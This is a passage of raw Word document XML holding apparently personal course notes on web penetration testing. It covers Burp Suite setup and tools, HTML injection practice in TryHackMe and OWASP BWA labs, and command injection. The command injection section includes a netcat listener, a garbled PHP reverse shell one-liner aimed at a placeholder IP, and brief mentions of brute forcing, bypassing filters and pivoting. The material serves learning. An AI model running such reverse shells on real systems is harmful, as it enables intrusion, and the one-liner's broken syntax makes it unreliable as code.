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4B68A" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 4 - Introduction to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="645BA18D" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Burpsuite configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A517AC3" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277D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Testing of web apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DF4AD5" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277D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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">" command will open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B468581" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277D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Config: Go to proxy -&gt; Turn off Intercept -&gt; navigate to options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7C5B35" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277D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 xml:space="preserve">-&gt; 127.0.0.1:8080 and running -&gt; go to web browser network setting and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC40D0B" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277D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applying manual proxy and put 127.0.0.1:8080 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38354486" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve">To visit https webpages download burp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>certificatefrom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00E277DE">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://burp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and import it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E92A750" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Burpsuite Intercept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2991B7" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> intercept option intercepts every traffic coming and going from the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C7D173" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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We have the option to forward, drop, perform any action on the requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BB1CEB" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Burpsuite Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75512BAD" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> repeater gives us the option to change parameter in the web request and repeat the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4605708D" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277D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Requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BBAFDB" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Burpsuite Intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10564E36" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve">Send any post request to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> intruder for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A032570" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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We can add the wordlist for the attacks or use manual keywords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7DBE46" w14:textId="00AF4B24" w:rsidR="007C592C" w:rsidRDefault="007C592C"/>
    <w:p w14:paraId="43BE1C4D" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Section 5 - HTML Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F508385" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HTML injection Theory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED28571" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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A web page is vulnerable to HTML injection when the html tags are interpreted in the fields of the web page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D563144" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HTML injection 1 on try hack me</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EACE93A" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve">Practicing HTML injection on Try hack me. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7C22B8" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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Use a VPN server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374CE614" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HTML injection 2 - Injecting user agent headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C236310" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve">Go to OWASPBWA virtual machine and open OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>multidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> II and in 2013 go to html injection -&gt; browser info. And try adding html codes in headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C0F78" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injecting cookie field and  redirecting the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A19FA" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve">Go to OWASPBWA virtual machine and open OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>multidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> II and in 2013 go to html injection -&gt; cookie injection. And try adding code in the cookie field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18936C2E" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Advance  Example of Html injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA9EAD0" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve"> Go to OWASPBWA virtual machine and open OWASP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>multidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> II and in 2013 go to html injection -&gt;Try hose back buttons. And try adding code in the fields by closing the previous tags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE24FE9" w14:textId="464B2500" w:rsidR="00E277DE" w:rsidRDefault="00E277DE"/>
    <w:p w14:paraId="1CFB778E" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Section 6 - Command Injection / Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76263F80" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Command Injection Theory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F0531" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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Command Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C56EDA9" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277D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It is a web vulnerability that allows an attacker to execute operating system command on the server that is running the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE84375" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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It allows the attacker to fully compromise the application and all of its data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0270E242" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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It allows to execute system command on the server ,which could also mean that we can see the files, check out the password folders, delete files and perhaps even set a reverse shell connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4B01B" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Blind Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C04C325" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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Command injection is a serious vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF29EC" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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lastRenderedPageBreak/>
        <w:t>Once its discovered, it allows the attacker to fully compromise the application and all of its data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B82783" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Solving Challenges With Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0B231" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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Use &amp;&amp; to concatenate 2 commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2950E755" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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It can be used to compromise other parts of the hosts infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC76014" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Running PHP Reverse Shell With Command Execution Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBD9B95" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">" command to open port in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> system and to listen on that port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B068570" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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Shell reverse command is used to connect target system with attacking system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1439D928" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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Example : "php -r '$sock = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sockopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">("&lt;IP address&gt;",&lt;port&gt;); exec("/bin/bash -I &lt;&amp;3 &gt;&amp; 3 2 &amp; 3"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4C813E" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto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5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bypassing Input Filter And Executing Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3406D35C" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve">Use command injection in a field which filters the field by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>bruteforcing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E277DE">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> many methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E72DDE" w14:textId="77777777" w:rsidR="00E277DE" w:rsidRPr="00E277DE" w:rsidRDefault="00E277DE" w:rsidP="00E277DE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 xml:space="preserve">It can be used to pivot the attack the other systems within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
